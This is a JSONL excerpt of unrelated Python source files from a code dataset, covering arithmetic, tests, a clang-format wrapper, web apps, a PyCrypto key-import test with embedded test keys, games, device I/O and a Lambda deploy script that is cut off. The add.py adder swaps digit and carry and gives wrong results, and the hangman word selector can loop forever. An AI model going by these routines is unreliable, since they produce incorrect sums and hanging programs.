+{"seq_id":"362676097","text":"from div import modulo\nfrom sub import sub\n\ndef add(a, b):\n\tif a < 0 and b < 0:\n\t\ta, b = -a, -b\n\telif a < 0:\n\t\treturn sub(b, -a)\n\telif b < 0:\n\t\treturn sub(a, -b)\n\tif len(a) < len(b):\n\t\ta, b = b, a\n\ti = len(b) - 1\n\tj = len(a) - 1\n\tcarry = 0\n\tres = ''\n\twhile i >= 0:\n\t\tk = (int(a[j]) + int(b[i]) + carry) // 10\n\t\tcarry = (int(a[j]) + int(b[i])) % 10\n\t\tres = str(k) + res\n\t\ti -= 1\n\t\tj -= 1\n\twhile j >= 0:\n\t\tk = (int(a[j]) + carry) // 10\n\t\tcarry = (int(a[j]) + carry) % 10\n\t\tres = str(k) + res\n\t\tj -= 1\n\tif carry != 0:\n\t\tres = str(carry) + res\n\treturn res\n\ndef add_modulo(a, b, m):\n\treturn modulo(int(add(a,b)), m)","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"10276257","text":"from __future__ import absolute_import\nfrom pycounter import report\nimport unittest\nimport datetime\n\n\nclass TestNextMonth(unittest.TestCase):\n def test_nextmonth(self):\n data = [((2000, 1, 1), (2000, 2, 1)),\n ((2000, 12, 1), (2001, 1, 1)),\n ((2000, 2, 29), (2000, 3, 1)),\n ((1999, 12, 6), (2000, 1, 1)),\n ]\n for pair in data:\n self.assertEqual(datetime.date(*pair[1]),\n report._next_month(datetime.date(*pair[0]))\n )\n","sub_path":"pycounter/test/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"133325378","text":"# ############################################################################ #\n# #\n# ::: :::::::: #\n# clang_format.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: cacharle +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/10/04 10:40:07 by cacharle #+# #+# #\n# Updated: 2021/10/10 22:24:42 by tayamamo ### ########.fr #\n# #\n# ############################################################################ #\n\nimport inspect\nimport os\nimport subprocess\nimport sys\nfrom contextlib import contextmanager\n\nimport c_formatter_42.data\n\nCONFIG_FILENAME = \".clang-format\"\n\nDATA_DIR = os.path.dirname(inspect.getfile(c_formatter_42.data))\n\n\n@contextmanager\ndef _config_context():\n \"\"\" Temporarly place .clang-format config file in the current directory\n If there already is a config in the current directory, it's backed up\n then put back in place after clang-format is done running\n \"\"\"\n config_path = os.path.join(DATA_DIR, CONFIG_FILENAME)\n previous_config = None\n try:\n os.symlink(config_path, CONFIG_FILENAME)\n except FileExistsError:\n if not os.path.islink(CONFIG_FILENAME):\n with open(CONFIG_FILENAME) as f:\n previous_config = f.read()\n os.unlink(CONFIG_FILENAME)\n os.symlink(config_path, CONFIG_FILENAME)\n try:\n yield\n finally:\n os.unlink(CONFIG_FILENAME)\n if previous_config is not None:\n with open(CONFIG_FILENAME, \"w\") as f:\n f.write(previous_config)\n\n\nif sys.platform == \"linux\":\n CLANG_FORMAT_EXEC = os.path.join(DATA_DIR, \"clang-format-linux\")\nelif sys.platform == \"darwin\":\n CLANG_FORMAT_EXEC = os.path.join(DATA_DIR, \"clang-format-darwin\")\nelse:\n raise NotImplementedError(\"Your platform is not supported\")\n\n\ndef clang_format(content: str) -> str:\n \"\"\" Wrapper around clang-format\n\n Pass content on stdin and return stdout.\n The clang-format executable is selected according to the platform,\n this is to keep the same version of clang-format accross all setup.\n \"\"\"\n with _config_context():\n process = subprocess.Popen(\n [CLANG_FORMAT_EXEC, \"-style=file\"],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n out, err = process.communicate(input=content.encode())\n if process.returncode != 0:\n raise RuntimeError(f\"clang-format error: {err.decode()}\")\n return out.decode()\n","sub_path":"c_formatter_42/formatters/clang_format.py","file_name":"clang_format.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"622132213","text":"import json\nfrom urllib import urlopen\nfrom bottle import *\nimport model\n\nbottle = Bottle()\n\n@bottle.route(\"/save\")\ndef save():\n data = json.loads(urlopen(\"http://opendata2.epa.gov.tw/AQX.json\").read())\n # get max PublishTime in the data\n publishtime = max([x[\"PublishTime\"] for x in data])\n # yield max(data, key=lambda x:x[\"PublishTime\"])\n\n out = {\"PublishTime\":publishtime}\n tmp = []\n for obj in data:\n tmp += [{\"County\":obj.get(\"County\"),\n \"SiteName\":obj.get(\"SiteName\"),\n \"PM25\":obj.get(\"PM2.5\"),\n \"PSI\":obj.get(\"PSI\")}]\n out.update({\"data\":tmp})\n\n result = model.Airquality.gql(\"WHERE publishtime = :1\", publishtime)\n\n if result.count() == 0:\n air = model.Airquality()\n air.publishtime = publishtime\n air.data = json.dumps(out)\n air.put()\n\n response.content_type = \"application/json\"\n yield json.dumps(out)\n\n@bottle.route(\"/query/\")\n@view(\"query\")\ndef query(publishtime):\n\n result = model.Airquality.gql(\"WHERE publishtime = :1\", publishtime)\n return dict(data=json_loads(result[0].data), time=result[0].publishtime)\n\n@bottle.route(\"/\")\n@bottle.route(\"/datelist\")\ndef datelist():\n for obj in model.Airquality.all().order(\"-publishtime\"):\n yield \"\" + obj.publishtime + \"\" + \"
\"\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"181203194","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Crypto\\SelfTest\\PublicKey\\test_importKey.py\n# Compiled at: 2013-03-14 04:43:25\nfrom __future__ import nested_scopes\n__revision__ = '$Id$'\nimport unittest\nfrom Crypto.PublicKey import RSA\nfrom Crypto.SelfTest.st_common import *\nfrom Crypto.Util.py3compat import *\nfrom Crypto.Util.number import inverse\nfrom Crypto.Util import asn1\n\ndef der2pem(der, text='PUBLIC'):\n import binascii\n chunks = [ binascii.b2a_base64(der[i:i + 48]) for i in range(0, len(der), 48) ]\n pem = b('-----BEGIN %s KEY-----\\n' % text)\n pem += b('').join(chunks)\n pem += b('-----END %s KEY-----' % text)\n return pem\n\n\nclass ImportKeyTests(unittest.TestCase):\n rsaKeyPEM = '-----BEGIN RSA PRIVATE KEY-----\\nMIIBOwIBAAJBAL8eJ5AKoIsjURpcEoGubZMxLD7+kT+TLr7UkvEtFrRhDDKMtuII\\nq19FrL4pUIMymPMSLBn3hJLe30Dw48GQM4UCAwEAAQJACUSDEp8RTe32ftq8IwG8\\nWojl5mAd1wFiIOrZ/Uv8b963WJOJiuQcVN29vxU5+My9GPZ7RA3hrDBEAoHUDPrI\\nOQIhAPIPLz4dphiD9imAkivY31Rc5AfHJiQRA7XixTcjEkojAiEAyh/pJHks/Mlr\\n+rdPNEpotBjfV4M4BkgGAA/ipcmaAjcCIQCHvhwwKVBLzzTscT2HeUdEeBMoiXXK\\nJACAr3sJQJGxIQIgarRp+m1WSKV1MciwMaTOnbU7wxFs9DP1pva76lYBzgUCIQC9\\nn0CnZCJ6IZYqSt0H5N7+Q+2Ro64nuwV/OSQfM6sBwQ==\\n-----END RSA PRIVATE KEY-----'\n rsaKeyPEM8 = '-----BEGIN PRIVATE KEY-----\\nMIIBVQIBADANBgkqhkiG9w0BAQEFAASCAT8wggE7AgEAAkEAvx4nkAqgiyNRGlwS\\nga5tkzEsPv6RP5MuvtSS8S0WtGEMMoy24girX0WsvilQgzKY8xIsGfeEkt7fQPDj\\nwZAzhQIDAQABAkAJRIMSnxFN7fZ+2rwjAbxaiOXmYB3XAWIg6tn9S/xv3rdYk4mK\\n5BxU3b2/FTn4zL0Y9ntEDeGsMEQCgdQM+sg5AiEA8g8vPh2mGIP2KYCSK9jfVFzk\\nB8cmJBEDteLFNyMSSiMCIQDKH+kkeSz8yWv6t080Smi0GN9XgzgGSAYAD+KlyZoC\\nNwIhAIe+HDApUEvPNOxxPYd5R0R4EyiJdcokAICvewlAkbEhAiBqtGn6bVZIpXUx\\nyLAxpM6dtTvDEWz0M/Wm9rvqVgHOBQIhAL2fQKdkInohlipK3Qfk3v5D7ZGjrie7\\nBX85JB8zqwHB\\n-----END PRIVATE KEY-----'\n rsaKeyEncryptedPEM = (\n ('test', '-----BEGIN RSA PRIVATE KEY-----\\nProc-Type: 4,ENCRYPTED\\nDEK-Info: DES-CBC,AF8F9A40BD2FA2FC\\n\\nCkl9ex1kaVEWhYC2QBmfaF+YPiR4NFkRXA7nj3dcnuFEzBnY5XULupqQpQI3qbfA\\nu8GYS7+b3toWWiHZivHbAAUBPDIZG9hKDyB9Sq2VMARGsX1yW1zhNvZLIiVJzUHs\\nC6NxQ1IJWOXzTew/xM2I26kPwHIvadq+/VaT8gLQdjdH0jOiVNaevjWnLgrn1mLP\\nBCNRMdcexozWtAFNNqSzfW58MJL2OdMi21ED184EFytIc1BlB+FZiGZduwKGuaKy\\n9bMbdb/1PSvsSzPsqW7KSSrTw6MgJAFJg6lzIYvR5F4poTVBxwBX3+EyEmShiaNY\\nIRX3TgQI0IjrVuLmvlZKbGWP18FXj7I7k9tSsNOOzllTTdq3ny5vgM3A+ynfAaxp\\ndysKznQ6P+IoqML1WxAID4aGRMWka+uArOJ148Rbj9s=\\n-----END RSA PRIVATE KEY-----',\n b'\\xaf\\x8f\\x9a@\\xbd/\\xa2\\xfc'),\n ('rocking', '-----BEGIN RSA PRIVATE KEY-----\\nProc-Type: 4,ENCRYPTED\\nDEK-Info: DES-EDE3-CBC,C05D6C07F7FC02F6\\n\\nw4lwQrXaVoTTJ0GgwY566htTA2/t1YlimhxkxYt9AEeCcidS5M0Wq9ClPiPz9O7F\\nm6K5QpM1rxo1RUE/ZyI85gglRNPdNwkeTOqit+kum7nN73AToX17+irVmOA4Z9E+\\n4O07t91GxGMcjUSIFk0ucwEU4jgxRvYscbvOMvNbuZszGdVNzBTVddnShKCsy9i7\\nnJbPlXeEKYi/OkRgO4PtfqqWQu5GIEFVUf9ev1QV7AvC+kyWTR1wWYnHX265jU5c\\nsopxQQtP8XEHIJEdd5/p1oieRcWTCNyY8EkslxDSsrf0OtZp6mZH9N+KU47cgQtt\\n9qGORmlWnsIoFFKcDohbtOaWBTKhkj5h6OkLjFjfU/sBeV1c+7wDT3dAy5tawXjG\\nYSxC7qDQIT/RECvV3+oQKEcmpEujn45wAnkTi12BH30=\\n-----END RSA PRIVATE KEY-----',\n b'\\xc0]l\\x07\\xf7\\xfc\\x02\\xf6'))\n rsaPublicKeyPEM = '-----BEGIN PUBLIC KEY-----\\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAL8eJ5AKoIsjURpcEoGubZMxLD7+kT+T\\nLr7UkvEtFrRhDDKMtuIIq19FrL4pUIMymPMSLBn3hJLe30Dw48GQM4UCAwEAAQ==\\n-----END PUBLIC KEY-----'\n rsaPublicKeyOpenSSH = b('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQC/HieQCqCLI1EaXBKBrm2TMSw+/pE/ky6+1JLxLRa0YQwyjLbiCKtfRay+KVCDMpjzEiwZ94SS3t9A8OPBkDOF comment\\n')\n rsaKeyDER = a2b_hex(('3082013b020100024100bf1e27900aa08b23511a5c1281ae6d93312c3efe\\n 913f932ebed492f12d16b4610c328cb6e208ab5f45acbe2950833298f312\\n 2c19f78492dedf40f0e3c190338502030100010240094483129f114dedf6\\n 7edabc2301bc5a88e5e6601dd7016220ead9fd4bfc6fdeb75893898ae41c\\n 54ddbdbf1539f8ccbd18f67b440de1ac30440281d40cfac839022100f20f\\n 2f3e1da61883f62980922bd8df545ce407c726241103b5e2c53723124a23\\n 022100ca1fe924792cfcc96bfab74f344a68b418df578338064806000fe2\\n a5c99a023702210087be1c3029504bcf34ec713d877947447813288975ca\\n 240080af7b094091b12102206ab469fa6d5648a57531c8b031a4ce9db53b\\n c3116cf433f5a6f6bbea5601ce05022100bd9f40a764227a21962a4add07\\n e4defe43ed91a3ae27bb057f39241f33ab01c1\\n ').replace(' ', ''))\n rsaKeyDER8 = a2b_hex(('30820155020100300d06092a864886f70d01010105000482013f3082013\\n b020100024100bf1e27900aa08b23511a5c1281ae6d93312c3efe913f932\\n ebed492f12d16b4610c328cb6e208ab5f45acbe2950833298f3122c19f78\\n 492dedf40f0e3c190338502030100010240094483129f114dedf67edabc2\\n 301bc5a88e5e6601dd7016220ead9fd4bfc6fdeb75893898ae41c54ddbdb\\n f1539f8ccbd18f67b440de1ac30440281d40cfac839022100f20f2f3e1da\\n 61883f62980922bd8df545ce407c726241103b5e2c53723124a23022100c\\n a1fe924792cfcc96bfab74f344a68b418df578338064806000fe2a5c99a0\\n 23702210087be1c3029504bcf34ec713d877947447813288975ca240080a\\n f7b094091b12102206ab469fa6d5648a57531c8b031a4ce9db53bc3116cf\\n 433f5a6f6bbea5601ce05022100bd9f40a764227a21962a4add07e4defe4\\n 3ed91a3ae27bb057f39241f33ab01c1\\n ').replace(' ', ''))\n rsaPublicKeyDER = a2b_hex(('305c300d06092a864886f70d0101010500034b003048024100bf1e27900a\\n a08b23511a5c1281ae6d93312c3efe913f932ebed492f12d16b4610c328c\\n b6e208ab5f45acbe2950833298f3122c19f78492dedf40f0e3c190338502\\n 03010001\\n ').replace(' ', ''))\n n = long(('BF 1E 27 90 0A A0 8B 23 51 1A 5C 12 81 AE 6D 93 31 2C 3E FE 91 3F 93 2E BE D4 92 F1 2D 16 B4 61 0C 32 8C B6 E2 08 AB 5F 45 AC BE 29 50 83 32 98 F3 12 2C 19 F7 84 92 DE DF 40 F0 E3 C1 90 33 85').replace(' ', ''), 16)\n e = 65537\n d = long(('09 44 83 12 9F 11 4D ED F6 7E DA BC 23 01 BC 5A 88 E5 E6 60 1D D7 01 62 20 EA D9 FD 4B FC 6F DE B7 58 93 89 8A E4 1C 54 DD BD BF 15 39 F8 CC BD 18 F6 7B 44 0D E1 AC 30 44 02 81 D4 0C FA C8 39').replace(' ', ''), 16)\n p = long(('00 F2 0F 2F 3E 1D A6 18 83 F6 29 80 92 2B D8 DF 54 5C E4 07 C7 26 24 11 03 B5 E2 C5 37 23 12 4A 23').replace(' ', ''), 16)\n q = long(('00 CA 1F E9 24 79 2C FC C9 6B FA B7 4F 34 4A 68 B4 18 DF 57 83 38 06 48 06 00 0F E2 A5 C9 9A 02 37').replace(' ', ''), 16)\n qInv = long(('00 BD 9F 40 A7 64 22 7A 21 96 2A 4A DD 07 E4 DE FE 43 ED 91 A3 AE 27 BB 05 7F 39 24 1F 33 AB 01 C1').replace(' ', ''), 16)\n pInv = inverse(p, q)\n\n def testImportKey1(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE\"\"\"\n key = self.rsa.importKey(self.rsaKeyDER)\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey2(self):\n \"\"\"Verify import of SubjectPublicKeyInfo DER SEQUENCE\"\"\"\n key = self.rsa.importKey(self.rsaPublicKeyDER)\n self.failIf(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey3unicode(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE, encoded with PEM as unicode\"\"\"\n key = RSA.importKey(self.rsaKeyPEM)\n self.assertEqual(key.has_private(), True)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey3bytes(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE, encoded with PEM as byte string\"\"\"\n key = RSA.importKey(b(self.rsaKeyPEM))\n self.assertEqual(key.has_private(), True)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey4unicode(self):\n \"\"\"Verify import of RSAPrivateKey DER SEQUENCE, encoded with PEM as unicode\"\"\"\n key = RSA.importKey(self.rsaPublicKeyPEM)\n self.assertEqual(key.has_private(), False)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey4bytes(self):\n \"\"\"Verify import of SubjectPublicKeyInfo DER SEQUENCE, encoded with PEM as byte string\"\"\"\n key = RSA.importKey(b(self.rsaPublicKeyPEM))\n self.assertEqual(key.has_private(), False)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey5(self):\n \"\"\"Verifies that the imported key is still a valid RSA pair\"\"\"\n key = RSA.importKey(self.rsaKeyPEM)\n idem = key.encrypt(key.decrypt(b('Test')), 0)\n self.assertEqual(idem[0], b('Test'))\n\n def testImportKey6(self):\n \"\"\"Verifies that the imported key is still a valid RSA pair\"\"\"\n key = RSA.importKey(self.rsaKeyDER)\n idem = key.encrypt(key.decrypt(b('Test')), 0)\n self.assertEqual(idem[0], b('Test'))\n\n def testImportKey7(self):\n \"\"\"Verify import of OpenSSH public key\"\"\"\n key = self.rsa.importKey(self.rsaPublicKeyOpenSSH)\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n\n def testImportKey8(self):\n \"\"\"Verify import of encrypted PrivateKeyInfo DER SEQUENCE\"\"\"\n for t in self.rsaKeyEncryptedPEM:\n key = self.rsa.importKey(t[1], t[0])\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey9(self):\n \"\"\"Verify import of unencrypted PrivateKeyInfo DER SEQUENCE\"\"\"\n key = self.rsa.importKey(self.rsaKeyDER8)\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey10(self):\n \"\"\"Verify import of unencrypted PrivateKeyInfo DER SEQUENCE, encoded with PEM\"\"\"\n key = self.rsa.importKey(self.rsaKeyPEM8)\n self.failUnless(key.has_private())\n self.assertEqual(key.n, self.n)\n self.assertEqual(key.e, self.e)\n self.assertEqual(key.d, self.d)\n self.assertEqual(key.p, self.p)\n self.assertEqual(key.q, self.q)\n\n def testImportKey11(self):\n \"\"\"Verify import of RSAPublicKey DER SEQUENCE\"\"\"\n der = asn1.DerSequence([17, 3]).encode()\n key = self.rsa.importKey(der)\n self.assertEqual(key.n, 17)\n self.assertEqual(key.e, 3)\n\n def testImportKey12(self):\n \"\"\"Verify import of RSAPublicKey DER SEQUENCE, encoded with PEM\"\"\"\n der = asn1.DerSequence([17, 3]).encode()\n pem = der2pem(der)\n key = self.rsa.importKey(pem)\n self.assertEqual(key.n, 17)\n self.assertEqual(key.e, 3)\n\n def testExportKey1(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n derKey = key.exportKey('DER')\n self.assertEqual(derKey, self.rsaKeyDER)\n\n def testExportKey2(self):\n key = self.rsa.construct([self.n, self.e])\n derKey = key.exportKey('DER')\n self.assertEqual(derKey, self.rsaPublicKeyDER)\n\n def testExportKey3(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n pemKey = key.exportKey('PEM')\n self.assertEqual(pemKey, b(self.rsaKeyPEM))\n\n def testExportKey4(self):\n key = self.rsa.construct([self.n, self.e])\n pemKey = key.exportKey('PEM')\n self.assertEqual(pemKey, b(self.rsaPublicKeyPEM))\n\n def testExportKey5(self):\n key = self.rsa.construct([self.n, self.e])\n openssh_1 = key.exportKey('OpenSSH').split()\n openssh_2 = self.rsaPublicKeyOpenSSH.split()\n self.assertEqual(openssh_1[0], openssh_2[0])\n self.assertEqual(openssh_1[1], openssh_2[1])\n\n def testExportKey6(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n t = map(b, self.rsaKeyEncryptedPEM[1])\n key._randfunc = lambda N: (t[2] * divmod(N + len(t[2]), len(t[2]))[0])[:N]\n pemKey = key.exportKey('PEM', t[0])\n self.assertEqual(pemKey, t[1])\n\n def testExportKey7(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n derKey = key.exportKey('DER', pkcs=8)\n self.assertEqual(derKey, self.rsaKeyDER8)\n\n def testExportKey8(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n pemKey = key.exportKey('PEM', pkcs=8)\n self.assertEqual(pemKey, b(self.rsaKeyPEM8))\n\n def testExportKey9(self):\n key = self.rsa.construct([self.n, self.e, self.d, self.p, self.q, self.pInv])\n self.assertRaises(ValueError, key.exportKey, 'invalid-format')\n\n\nclass ImportKeyTestsSlow(ImportKeyTests):\n\n def setUp(self):\n self.rsa = RSA.RSAImplementation(use_fast_math=0)\n\n\nclass ImportKeyTestsFast(ImportKeyTests):\n\n def setUp(self):\n self.rsa = RSA.RSAImplementation(use_fast_math=1)\n\n\nif __name__ == '__main__':\n unittest.main()\n\ndef get_tests(config={}):\n tests = []\n try:\n from Crypto.PublicKey import _fastmath\n tests += list_test_cases(ImportKeyTestsFast)\n except ImportError:\n pass\n\n tests += list_test_cases(ImportKeyTestsSlow)\n return tests\n\n\nif __name__ == '__main__':\n suite = lambda : unittest.TestSuite(get_tests())\n unittest.main(defaultTest='suite')","sub_path":"pycfiles/dlitztest-2.6-py2.7-win32/test_importKey.py","file_name":"test_importKey.py","file_ext":"py","file_size_in_byte":13601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"316058893","text":"import imageio\nimport torch\n\n'''\nIn Medical Imagery, You have an extra dimension, depth, after the\nchannel dimension, leading to a 5D tensor of shape N x C x D x H x W\n'''\n\ndir_path = \"xyz\" # path to directory of medical images\nvol_arr = imageio.volread(dir_path, 'DICOM') # vol read is function for reading volumetric images\n# print(vol_arr.shape)\n\n# make room for channel dimension\nvol = torch.from_numpy(vol_arr).float()\nvol = torch.transpose(vol, 0, 2)\nvol = torch.unsqueeze(vol, 0)\n# unsqueeze is the opposite of squeeze, which removes an axis, unsqueeze add an axis to given dimension\n# there is a confusion among view/squeeze/resize/unsqueeze.\n\nprint(vol.shape)\n","sub_path":"pytorch_learning/pt_006realdata_voxels.py","file_name":"pt_006realdata_voxels.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"180073010","text":"\"\"\"\nHangman.\n\nAuthors: Tyler Thenell and Zachary Zdanavicius.\n\"\"\" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.\n\n# DONE: 2. Implement Hangman using your Iterative Enhancement Plan.\nimport random\n####### Do NOT attempt this assignment before class! #######\n\n\ndef main():\n print('_________________________________')\n print('| -HANGMAN- |')\n print('| Tyler & Zach |')\n print('|________________________________|')\n min_length = int(input('Give a minimum length: '))\n num_guesses = int(input('How many chances do you want: '))\n secret_word = word_selector(min_length)\n guessing_runner(secret_word, num_guesses)\n\n\ndef word_selector(minimum):\n with open('words.txt') as f:\n f.readline()\n string = f.read()\n word = string.split()\n r = random.randrange(0, len(word))\n item = word[r]\n while True:\n if len(item) >= minimum:\n return item\n\n\ndef print_known(secret_word, guessed):\n print()\n for k in range(len(secret_word)):\n for j in range(len(guessed)):\n if secret_word[k] == guessed[j]:\n print(secret_word[k], end='')\n break\n if j+1 == len(guessed):\n print('_ ', end='')\n\n\ndef guessing_runner(secret_word, num_guesses):\n guessed = ''\n num_guessed = 0\n while num_guessed < num_guesses:\n print_known(secret_word, guessed)\n print()\n print('You have', num_guesses - num_guessed, 'tries left!')\n print('And have guessed: ', guessed)\n new_guess = input('Enter your new guess: ')\n if len(new_guess) == 1:\n guessed += new_guess\n\n for k in range(len(secret_word)):\n if secret_word[k] == new_guess:\n num_guessed -= 1\n break\n\n num_guessed += 1\n if win_check(secret_word, guessed) == True:\n results(True, secret_word)\n return\n\n results(False, secret_word)\n\n\ndef win_check(secret_word, guessed):\n checker = ''\n for k in range(len(secret_word)):\n for j in range(len(guessed)):\n if secret_word[k] == guessed[j]:\n checker += guessed[j]\n break\n if secret_word == checker:\n return True\n return False\n\n\ndef results(result, secret_word):\n for k in range(10):\n print()\n print(' __________________')\n if result == True:\n print('| YOU WIN! |')\n if result == False:\n print('| YOU LOSE |')\n print('|__________________|')\n print('The word was: ', secret_word)\n\nmain()\n","sub_path":"src/m1_hangman.py","file_name":"m1_hangman.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"167154263","text":"import time\nimport logging\nimport gevent\nfrom rhizo import util\n\n\n# The Device class handles communcation with hardware devices connected via a serial port.\nclass Device(object):\n\n # initialize the device object given a device ID (a short string) and controller used to communicate with the device;\n # device IDs should be unique within one serial port connection, but need not be unique across serial ports\n def __init__(self, device_id, controller, port_name = None):\n self._device_id = device_id\n self._controller = controller\n self._port_name = port_name\n self._last_ack = ''\n self._enable_polling = False\n self._polling_interval = 0.2 # default polling interval in seconds\n self._last_poll_time = None # last poll time (from time.time())\n\n # device creation method\n @classmethod\n def create(cls, device_id, controller, port_name = None):\n device = cls(device_id, controller, port_name)\n controller.serial.add_device(device)\n return device\n\n # get the device's serial port name\n def port_name(self):\n return self._port_name\n\n # get the device's ID\n def device_id(self):\n return self._device_id\n\n # set whether this device should be polled in the main polling loop\n def enable_polling(self, enabled, interval=None):\n self._enable_polling = enabled\n if interval:\n self._polling_interval = interval \n\n # turn on/off checksum verification on the device\n def enable_checksum(self, enable):\n if enable:\n self.send_command('checksum 1')\n else:\n self.send_command('checksum 0')\n\n # process a serial message received from the device\n # fix(clean): remove message?\n def process_serial_message(self, command, args, message):\n used = True\n if (command == 'ack' or command == 'ack:'):\n self._last_ack = message[4:].strip()\n elif (command == 'log' or command == 'log:') and len(args) > 0:\n self._controller.update_sequence('log', self._device_id + ': ' + message[4:].strip())\n elif command == 'updateSequence' and len(args) > 1:\n sequence_name = args[0]\n value = ' '.join(args[1:])\n value = util.convert_value(value)\n self._controller.update_sequence(sequence_name, value)\n else:\n used = False\n return used\n\n # send a command to the device; waits for acknowledgement of the command\n def send_command(self, command, timeout=120):\n serial = self._controller.serial\n if serial.is_connected():\n port = serial.port(self._port_name) if self._port_name else serial.port()\n while port.busy: # we don't want to interleave serial messages\n gevent.sleep(0.02)\n try:\n port.busy = True\n self._last_ack = ''\n ack_match = False\n count = 0\n send_q_r = False\n start_time = None\n while not ack_match:\n port.check_sum_error = False # reset this at the top of the command\n send_time = time.time()\n if not start_time:\n start_time = send_time\n if send_q_r:\n message = '%s:%s' % (self._device_id, 'qr')\n port.write_command(message)\n logging.debug('requesting resend %s:%s' % (self._device_id, command))\n logging.debug('sending %s:%s' % (self._device_id, 'qr'))\n else:\n message = '%s:%s' % (self._device_id, command)\n if (command != 'q' or not self._controller.config.serial.get('quiet_polling', True)) and self._controller.config.serial.get('log_messages', True):\n logging.debug('sending %s:%s' % (self._device_id, command))\n port.write_command(message)\n if count > 0:\n logging.debug('resend %d: %s:%s' % (count, self._device_id, command))\n count += 1\n\n # if broadcast message then we won't get an ack, we can break here\n if self._device_id == '*':\n ack_match = True\n break\n\n # wait until ack or timeout\n while time.time() - send_time < 2:\n gevent.sleep(0.02)\n if send_q_r:\n if self._last_ack == 'qr':\n ack_match = True\n break\n else:\n if self._last_ack == command:\n ack_match = True\n break\n\n # see if we need to request a resend of messages\n if port.check_sum_error and ack_match and self._controller.config.serial.get('enable_polling_resends', False):\n send_q_r = True\n ack_match = False\n\n # eventually give up\n if not ack_match and time.time() - start_time > timeout:\n raise Exception('timeout waiting for ack (%s:%s)' % (self._device_id, command))\n finally:\n port.busy = False\n else:\n if (command != 'q' or not self._controller.config.serial.get('quiet_polling', True)) and self._controller.config.serial.get('log_messages', True):\n logging.debug('[sim] %s: %s' % (self._device_id, command))\n","sub_path":"rhizo/extensions/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249326353","text":"import json\nimport boto3\nimport zipfile\nimport StringIO\nimport mimetypes\n\n\ndef lambda_handler(event, context):\n s3 = boto3.resource('s3')\n sns = boto3.resource('sns')\n\n topic = sns.Topic('arn:aws:sns:us-east-1:794138155809:deployPersonalLanding')\n\n location = {\n 'bucketName': 'build.ianbunn.studio',\n 'objectKey': 'personalLandingFiles.zip'\n }\n\n try:\n job = event.get('CodePipeline.job')\n if job:\n for artifact in job['data']['inputArtifacts']:\n if artifact['name'] == 'BuildArtifact':\n location = artifact['location']['s3Location']\n\n # Declaring s3 destination for files\n personal_bucket = s3.Bucket('ianbunn.studio')\n # Declaring s3 location of files\n build_personal_bucket = s3.Bucket(location['bucketName'])\n\n # Declares StringIO\n build_personal_zip = StringIO.StringIO()\n # Reads downloaded zip in memory using StringIO\n build_personal_bucket.download_fileobj(location['objectKey'], build_personal_zip)\n\n # Uploads all files downloaded and opened in memory to s3 destination\n with zipfile.ZipFile(build_personal_zip) as myzip:\n for name in myzip.namelist():\n obj = 